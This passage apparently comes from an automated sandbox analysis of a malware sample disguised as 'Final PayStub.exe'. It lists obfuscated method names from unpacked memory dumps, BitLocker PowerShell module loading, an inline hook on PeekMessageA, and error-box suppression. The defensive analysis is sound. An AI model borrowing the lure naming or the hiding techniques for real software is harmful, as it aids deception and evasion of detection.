Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, xxbxY2Z9vd4cHjlIbh.cs	High entropy of concatenated method names: 'FgNv5Rqkpn', 'uIRvsos7gv', 'X9jvZD7oob', 'hpSvARbh3a', 'CtTvIhHwpn', 'BtRvr5OJs8', 'jJAvOsmmcG', 'G1yvCO15qW', 'OQlvg7hmXr', 'zxuve06rUH'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, supWjDaW5dmDmJlk8F.cs	High entropy of concatenated method names: 'gOMQE2SQ0', 'OSpc873Oe', 'g5rSr11ax', 'H8s6nfg9t', 'E66dY5QUq', 'Bv5YgyaGi', 'vrjEb0RUXqWilB2M6c', 'yQXbe6mlPPoTBsh7Na', 'fGPHbNMTA', 'XxZLFNO23'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, KiQGnrmamh34JjKE7Dp.cs	High entropy of concatenated method names: 'ToString', 'sVFn7LDYWt', 'g6nnd7jB2U', 'zlVnYaCy8U', 'OpEnXuCQVh', 'UvcnIAhDO0', 'tTVnrTigVK', 'RxPnOtsk9x', 'wvBIYAjHgPJsIfi8j1X', 'UuHr04j2APoabD2KDF3'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, fCe2LR7QHvaE040eJZ.cs	High entropy of concatenated method names: 'Tu1qZPIlTY', 'AFOqAQhE1k', 'MAMqR3v294', 'cT2qwK3fET', 'Vwfqfd1A6h', 'EfdqbbikX4', 'VHvqT8x5rC', 'newqjw1bst', 'eLOq0Ai1v8', 'DiOqEBvRtn'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, M9Vkn3TaZgwe5t7v82.cs	High entropy of concatenated method names: 'tY82vDxUiU', 'ddq2uWgpL4', 'Tmt22n7VNZ', 'DLb2nYRvTo', 'PNk2xhmvBT', 'j1j2KN3QVj', 'Dispose', 'LDtH9P10od', 'kSaHqsSJKB', 'FsVHhqwSMG'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, baN41BqwqM6L3xCD86.cs	High entropy of concatenated method names: 'Dispose', 'Kwem05t7v8', 'IOUaI2pATY', 'ebnrKYGX6t', 'rsEmEB8ORH', 'wZnmzFnfrj', 'ProcessDialogKey', 'KhkaoxAX0D', 'srDampGbHb', 'gFOaaS1PHE'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, lXL7fXRnQrCL35f5kl.cs	High entropy of concatenated method names: 'ToString', 'ROVypuECmX', 'dPsyIWFQJZ', 'janyrsUEHo', 'OQtyOQUKXk', 'dkpyCEJ2JA', 'bmqygqd5pj', 'V7WyeyEls0', 'JDZyttGBMC', 'Y2HyB5EaWE'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, C1PHEJE7Jyph2wkLMR.cs	High entropy of concatenated method names: 'AhILhbgQjl', 'hK9LUQTBW6', 'LjbL36BtNV', 'PMuLJGLk9h', 'qAWL2mkPEn', 'tiBLPNKLQM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, ovGs2Lb3joS9jd27To.cs	High entropy of concatenated method names: 'L4fujEcBmy', 'eqiuEabTUx', 'B2yHoNOCtJ', 'GIMHmJh7bS', 'UWfup853vi', 'KteusBEGFE', 'ihruM5TMty', 'r8DuZZC4qp', 'WocuAfFYIe', 'j4iuRIfTtO'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, fwXSJjMGhlkZrfkerZ.cs	High entropy of concatenated method names: 'D1Ek7EjbkN', 'fj7kdUOWR9', 'zJUkX55kHF', 'H35kIE3uAx', 'm9QkOSpNvW', 'jBskCRn6ko', 'flxkemTT6I', 'WJektSdgfu', 'k12k55EL68', 'EqRkpnvurS'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, a45eaNmGPk5XH2hOZrn.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'e5Qi2P3Yt9', 'rhPiLhODeY', 'skniniWoEF', 'hExiiBj89O', 'sHNixjswBS', 'w4IilDPn0e', 'GopiK3HNAQ'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, UIi2f1mmcmjO0c1JPBF.cs	High entropy of concatenated method names: 'MpHLEVOAXj', 'OpFLzPG5mJ', 'kPDnoMt1Xu', 'NXanmkjbCn', 'YvFnaoi11c', 'kUCnFhgXOj', 'Qh3nGcK1Jh', 'kHyn1QsNZR', 'RZTn9vE3qJ', 'AB4nqf1Kfm'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, hu02KbXCoVgki0fhQf.cs	High entropy of concatenated method names: 'X4E31WJaf9', 'PPA3qS2CQS', 'dCY3UIQcZo', 'z383Jk5nvB', 'FUo3PtG92n', 'pLtUfFO23l', 'qatUbIxNZd', 'gF0UTCQLPC', 'EQbUjgQnPE', 'SOeU0KBcAN'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, xYrxOVGHwghaR2Sf9e.cs	High entropy of concatenated method names: 'KoqmJCe2LR', 'zHvmPaE040', 'bQamNya67F', 'OELm8DJyPT', 'sAjmvYBhu0', 'rKbmyCoVgk', 'nNZJP72Kyc0AvIf9Ce', 'tQGRvGv3TVb3tZy52p', 'UiWmmvygGS', 'kp2mFLcFEM'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, l2WgOdB0TRoW6n683T.cs	High entropy of concatenated method names: 'OebJDuNDKq', 'T83JVSXKXR', 'nfsJQwPVqa', 'dGmJcbpP3H', 'Tm9J4qtwBJ', 'yDHJSPJFOd', 'Ah1J6W5sGK', 'fB1J7mV8to', 'go0JdAVNA8', 'KhUJYsXg9p'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, RKMlpdPot5wO6QoIpj.cs	High entropy of concatenated method names: 'i4kF1jQGBQ', 'T4rF9hdkxW', 'ioyFqNJZH7', 'rMyFhVRVa3', 'JqrFUS1Rdt', 'q6KF3WycqW', 'HcjFJad92G', 's0vFPtOkkU', 'TioFWHlsg0', 'XarFNQ4r5H'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, NQOFQFeMqktKKTY9a9.cs	High entropy of concatenated method names: 'iW0J9QfBFi', 'Q3mJhyEkjr', 'VkCJ3qDToC', 'YVB3EKaptE', 'QPn3zcxhNP', 'gQHJooCq0K', 'FL2Jmw3jMr', 'Dg3JabMveC', 'Xn1JF0MMUM', 'vq1JGEn5Nn'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, ujr4FewfaoQR6NIL2j.cs	High entropy of concatenated method names: 'UMLuNJS7Fg', 'F8Su8EqoXq', 'ToString', 'pr2u91VOkL', 'kCWuqYgXFL', 'LN2uh18dmq', 'TGGuUNS5fL', 'K8ru3aEdEE', 'uSCuJi5ixu', 'hn0uPaJp3I'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, WDN3EmdQaya67FpELD.cs	High entropy of concatenated method names: 'sIjhc5jmtw', 'WU0hSA1Y57', 'IZrh7Dcuwd', 'd5lhdLlVR6', 'sKEhvrdqkU', 'Vnkhypyknd', 'OXThurmGZ6', 'GobhHIef12', 'T90h2deUAp', 'hnohLWbbnp'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, jyPTrXY3IbVQR2AjYB.cs	High entropy of concatenated method names: 'eUxU4YRxNY', 'I65U6NUAIm', 'sw8hr0DNSH', 'MXmhOK7acf', 'qEFhCMMOhs', 'Atfhg0pODo', 'wYjhevii4x', 'xdRhtI16Cp', 'wY1hBxbJbg', 'YrKh56mlMq'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, nxAX0D0LrDpGbHbhFO.cs	High entropy of concatenated method names: 'FOf2XOXH3Q', 'p3o2IlahS6', 'ibe2rDbuAe', 'Cgp2O8JLbD', 'Liw2CQ8mw1', 'Cpl2gG0Inl', 'Cnk2eefQWm', 'FRe2tsoG1V', 'QHS2B4YPU8', 'Xm625sAO87'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, NZJdRImoDkkMUFuS3mf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ToVLpEhLDy', 'sP9LsM82ea', 'ky7LMQbecb', 'ObKLZyA9pC', 'bCoLAnjuY2', 'KjTLRDgMfV', 'mwDLwgnC1H'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, qeluNghML34CQ7NOl4.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'o88a0KiiBV', 'QgUaE5F1Pn', 'xHkazusbAJ', 'VYBFohAHZJ', 'p3IFmQgpra', 'ryoFaU3sjE', 'vIPFF7dUHL', 'O0w7sUdZ7hHkarVYyuD'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, ltVIKezMFLBsJBaIol.cs	High entropy of concatenated method names: 'ltMLSoS2gc', 'MueL7vXVpW', 'FetLd2qJYI', 'Qa0LXcOaIk', 'eDeLImSggT', 'NVaLOqKyxr', 'Es4LCnXTll', 'dtjLKHqvbJ', 'qr7LDfE6xx', 'Fu9LVQQQns'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, xxbxY2Z9vd4cHjlIbh.cs	High entropy of concatenated method names: 'FgNv5Rqkpn', 'uIRvsos7gv', 'X9jvZD7oob', 'hpSvARbh3a', 'CtTvIhHwpn', 'BtRvr5OJs8', 'jJAvOsmmcG', 'G1yvCO15qW', 'OQlvg7hmXr', 'zxuve06rUH'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, supWjDaW5dmDmJlk8F.cs	High entropy of concatenated method names: 'gOMQE2SQ0', 'OSpc873Oe', 'g5rSr11ax', 'H8s6nfg9t', 'E66dY5QUq', 'Bv5YgyaGi', 'vrjEb0RUXqWilB2M6c', 'yQXbe6mlPPoTBsh7Na', 'fGPHbNMTA', 'XxZLFNO23'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, KiQGnrmamh34JjKE7Dp.cs	High entropy of concatenated method names: 'ToString', 'sVFn7LDYWt', 'g6nnd7jB2U', 'zlVnYaCy8U', 'OpEnXuCQVh', 'UvcnIAhDO0', 'tTVnrTigVK', 'RxPnOtsk9x', 'wvBIYAjHgPJsIfi8j1X', 'UuHr04j2APoabD2KDF3'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, fCe2LR7QHvaE040eJZ.cs	High entropy of concatenated method names: 'Tu1qZPIlTY', 'AFOqAQhE1k', 'MAMqR3v294', 'cT2qwK3fET', 'Vwfqfd1A6h', 'EfdqbbikX4', 'VHvqT8x5rC', 'newqjw1bst', 'eLOq0Ai1v8', 'DiOqEBvRtn'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, M9Vkn3TaZgwe5t7v82.cs	High entropy of concatenated method names: 'tY82vDxUiU', 'ddq2uWgpL4', 'Tmt22n7VNZ', 'DLb2nYRvTo', 'PNk2xhmvBT', 'j1j2KN3QVj', 'Dispose', 'LDtH9P10od', 'kSaHqsSJKB', 'FsVHhqwSMG'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, baN41BqwqM6L3xCD86.cs	High entropy of concatenated method names: 'Dispose', 'Kwem05t7v8', 'IOUaI2pATY', 'ebnrKYGX6t', 'rsEmEB8ORH', 'wZnmzFnfrj', 'ProcessDialogKey', 'KhkaoxAX0D', 'srDampGbHb', 'gFOaaS1PHE'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, lXL7fXRnQrCL35f5kl.cs	High entropy of concatenated method names: 'ToString', 'ROVypuECmX', 'dPsyIWFQJZ', 'janyrsUEHo', 'OQtyOQUKXk', 'dkpyCEJ2JA', 'bmqygqd5pj', 'V7WyeyEls0', 'JDZyttGBMC', 'Y2HyB5EaWE'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, C1PHEJE7Jyph2wkLMR.cs	High entropy of concatenated method names: 'AhILhbgQjl', 'hK9LUQTBW6', 'LjbL36BtNV', 'PMuLJGLk9h', 'qAWL2mkPEn', 'tiBLPNKLQM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, ovGs2Lb3joS9jd27To.cs	High entropy of concatenated method names: 'L4fujEcBmy', 'eqiuEabTUx', 'B2yHoNOCtJ', 'GIMHmJh7bS', 'UWfup853vi', 'KteusBEGFE', 'ihruM5TMty', 'r8DuZZC4qp', 'WocuAfFYIe', 'j4iuRIfTtO'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, fwXSJjMGhlkZrfkerZ.cs	High entropy of concatenated method names: 'D1Ek7EjbkN', 'fj7kdUOWR9', 'zJUkX55kHF', 'H35kIE3uAx', 'm9QkOSpNvW', 'jBskCRn6ko', 'flxkemTT6I', 'WJektSdgfu', 'k12k55EL68', 'EqRkpnvurS'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, a45eaNmGPk5XH2hOZrn.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'e5Qi2P3Yt9', 'rhPiLhODeY', 'skniniWoEF', 'hExiiBj89O', 'sHNixjswBS', 'w4IilDPn0e', 'GopiK3HNAQ'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, UIi2f1mmcmjO0c1JPBF.cs	High entropy of concatenated method names: 'MpHLEVOAXj', 'OpFLzPG5mJ', 'kPDnoMt1Xu', 'NXanmkjbCn', 'YvFnaoi11c', 'kUCnFhgXOj', 'Qh3nGcK1Jh', 'kHyn1QsNZR', 'RZTn9vE3qJ', 'AB4nqf1Kfm'
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, hu02KbXCoVgki0fhQf.cs	High entropy of concatenated method names: 'X4E31WJaf9', 'PPA3qS2CQS', 'dCY3UIQcZo', 'z383Jk5nvB', 'FUo3PtG92n', 'pLtUfFO23l', 'qatUbIxNZd', 'gF0UTCQLPC', 'EQbUjgQnPE', 'SOeU0KBcAN'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, xYrxOVGHwghaR2Sf9e.cs	High entropy of concatenated method names: 'KoqmJCe2LR', 'zHvmPaE040', 'bQamNya67F', 'OELm8DJyPT', 'sAjmvYBhu0', 'rKbmyCoVgk', 'nNZJP72Kyc0AvIf9Ce', 'tQGRvGv3TVb3tZy52p', 'UiWmmvygGS', 'kp2mFLcFEM'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, l2WgOdB0TRoW6n683T.cs	High entropy of concatenated method names: 'OebJDuNDKq', 'T83JVSXKXR', 'nfsJQwPVqa', 'dGmJcbpP3H', 'Tm9J4qtwBJ', 'yDHJSPJFOd', 'Ah1J6W5sGK', 'fB1J7mV8to', 'go0JdAVNA8', 'KhUJYsXg9p'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, RKMlpdPot5wO6QoIpj.cs	High entropy of concatenated method names: 'i4kF1jQGBQ', 'T4rF9hdkxW', 'ioyFqNJZH7', 'rMyFhVRVa3', 'JqrFUS1Rdt', 'q6KF3WycqW', 'HcjFJad92G', 's0vFPtOkkU', 'TioFWHlsg0', 'XarFNQ4r5H'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, NQOFQFeMqktKKTY9a9.cs	High entropy of concatenated method names: 'iW0J9QfBFi', 'Q3mJhyEkjr', 'VkCJ3qDToC', 'YVB3EKaptE', 'QPn3zcxhNP', 'gQHJooCq0K', 'FL2Jmw3jMr', 'Dg3JabMveC', 'Xn1JF0MMUM', 'vq1JGEn5Nn'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, ujr4FewfaoQR6NIL2j.cs	High entropy of concatenated method names: 'UMLuNJS7Fg', 'F8Su8EqoXq', 'ToString', 'pr2u91VOkL', 'kCWuqYgXFL', 'LN2uh18dmq', 'TGGuUNS5fL', 'K8ru3aEdEE', 'uSCuJi5ixu', 'hn0uPaJp3I'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, WDN3EmdQaya67FpELD.cs	High entropy of concatenated method names: 'sIjhc5jmtw', 'WU0hSA1Y57', 'IZrh7Dcuwd', 'd5lhdLlVR6', 'sKEhvrdqkU', 'Vnkhypyknd', 'OXThurmGZ6', 'GobhHIef12', 'T90h2deUAp', 'hnohLWbbnp'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, jyPTrXY3IbVQR2AjYB.cs	High entropy of concatenated method names: 'eUxU4YRxNY', 'I65U6NUAIm', 'sw8hr0DNSH', 'MXmhOK7acf', 'qEFhCMMOhs', 'Atfhg0pODo', 'wYjhevii4x', 'xdRhtI16Cp', 'wY1hBxbJbg', 'YrKh56mlMq'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, nxAX0D0LrDpGbHbhFO.cs	High entropy of concatenated method names: 'FOf2XOXH3Q', 'p3o2IlahS6', 'ibe2rDbuAe', 'Cgp2O8JLbD', 'Liw2CQ8mw1', 'Cpl2gG0Inl', 'Cnk2eefQWm', 'FRe2tsoG1V', 'QHS2B4YPU8', 'Xm625sAO87'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, NZJdRImoDkkMUFuS3mf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ToVLpEhLDy', 'sP9LsM82ea', 'ky7LMQbecb', 'ObKLZyA9pC', 'bCoLAnjuY2', 'KjTLRDgMfV', 'mwDLwgnC1H'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, qeluNghML34CQ7NOl4.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'o88a0KiiBV', 'QgUaE5F1Pn', 'xHkazusbAJ', 'VYBFohAHZJ', 'p3IFmQgpra', 'ryoFaU3sjE', 'vIPFF7dUHL', 'O0w7sUdZ7hHkarVYyuD'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, ltVIKezMFLBsJBaIol.cs	High entropy of concatenated method names: 'ltMLSoS2gc', 'MueL7vXVpW', 'FetLd2qJYI', 'Qa0LXcOaIk', 'eDeLImSggT', 'NVaLOqKyxr', 'Es4LCnXTll', 'dtjLKHqvbJ', 'qr7LDfE6xx', 'Fu9LVQQQns'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, xxbxY2Z9vd4cHjlIbh.cs	High entropy of concatenated method names: 'FgNv5Rqkpn', 'uIRvsos7gv', 'X9jvZD7oob', 'hpSvARbh3a', 'CtTvIhHwpn', 'BtRvr5OJs8', 'jJAvOsmmcG', 'G1yvCO15qW', 'OQlvg7hmXr', 'zxuve06rUH'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, supWjDaW5dmDmJlk8F.cs	High entropy of concatenated method names: 'gOMQE2SQ0', 'OSpc873Oe', 'g5rSr11ax', 'H8s6nfg9t', 'E66dY5QUq', 'Bv5YgyaGi', 'vrjEb0RUXqWilB2M6c', 'yQXbe6mlPPoTBsh7Na', 'fGPHbNMTA', 'XxZLFNO23'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, KiQGnrmamh34JjKE7Dp.cs	High entropy of concatenated method names: 'ToString', 'sVFn7LDYWt', 'g6nnd7jB2U', 'zlVnYaCy8U', 'OpEnXuCQVh', 'UvcnIAhDO0', 'tTVnrTigVK', 'RxPnOtsk9x', 'wvBIYAjHgPJsIfi8j1X', 'UuHr04j2APoabD2KDF3'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, fCe2LR7QHvaE040eJZ.cs	High entropy of concatenated method names: 'Tu1qZPIlTY', 'AFOqAQhE1k', 'MAMqR3v294', 'cT2qwK3fET', 'Vwfqfd1A6h', 'EfdqbbikX4', 'VHvqT8x5rC', 'newqjw1bst', 'eLOq0Ai1v8', 'DiOqEBvRtn'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, M9Vkn3TaZgwe5t7v82.cs	High entropy of concatenated method names: 'tY82vDxUiU', 'ddq2uWgpL4', 'Tmt22n7VNZ', 'DLb2nYRvTo', 'PNk2xhmvBT', 'j1j2KN3QVj', 'Dispose', 'LDtH9P10od', 'kSaHqsSJKB', 'FsVHhqwSMG'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, baN41BqwqM6L3xCD86.cs	High entropy of concatenated method names: 'Dispose', 'Kwem05t7v8', 'IOUaI2pATY', 'ebnrKYGX6t', 'rsEmEB8ORH', 'wZnmzFnfrj', 'ProcessDialogKey', 'KhkaoxAX0D', 'srDampGbHb', 'gFOaaS1PHE'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, lXL7fXRnQrCL35f5kl.cs	High entropy of concatenated method names: 'ToString', 'ROVypuECmX', 'dPsyIWFQJZ', 'janyrsUEHo', 'OQtyOQUKXk', 'dkpyCEJ2JA', 'bmqygqd5pj', 'V7WyeyEls0', 'JDZyttGBMC', 'Y2HyB5EaWE'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, C1PHEJE7Jyph2wkLMR.cs	High entropy of concatenated method names: 'AhILhbgQjl', 'hK9LUQTBW6', 'LjbL36BtNV', 'PMuLJGLk9h', 'qAWL2mkPEn', 'tiBLPNKLQM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, ovGs2Lb3joS9jd27To.cs	High entropy of concatenated method names: 'L4fujEcBmy', 'eqiuEabTUx', 'B2yHoNOCtJ', 'GIMHmJh7bS', 'UWfup853vi', 'KteusBEGFE', 'ihruM5TMty', 'r8DuZZC4qp', 'WocuAfFYIe', 'j4iuRIfTtO'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, fwXSJjMGhlkZrfkerZ.cs	High entropy of concatenated method names: 'D1Ek7EjbkN', 'fj7kdUOWR9', 'zJUkX55kHF', 'H35kIE3uAx', 'm9QkOSpNvW', 'jBskCRn6ko', 'flxkemTT6I', 'WJektSdgfu', 'k12k55EL68', 'EqRkpnvurS'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, a45eaNmGPk5XH2hOZrn.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'e5Qi2P3Yt9', 'rhPiLhODeY', 'skniniWoEF', 'hExiiBj89O', 'sHNixjswBS', 'w4IilDPn0e', 'GopiK3HNAQ'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, UIi2f1mmcmjO0c1JPBF.cs	High entropy of concatenated method names: 'MpHLEVOAXj', 'OpFLzPG5mJ', 'kPDnoMt1Xu', 'NXanmkjbCn', 'YvFnaoi11c', 'kUCnFhgXOj', 'Qh3nGcK1Jh', 'kHyn1QsNZR', 'RZTn9vE3qJ', 'AB4nqf1Kfm'
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, hu02KbXCoVgki0fhQf.cs	High entropy of concatenated method names: 'X4E31WJaf9', 'PPA3qS2CQS', 'dCY3UIQcZo', 'z383Jk5nvB', 'FUo3PtG92n', 'pLtUfFO23l', 'qatUbIxNZd', 'gF0UTCQLPC', 'EQbUjgQnPE', 'SOeU0KBcAN'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2

Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
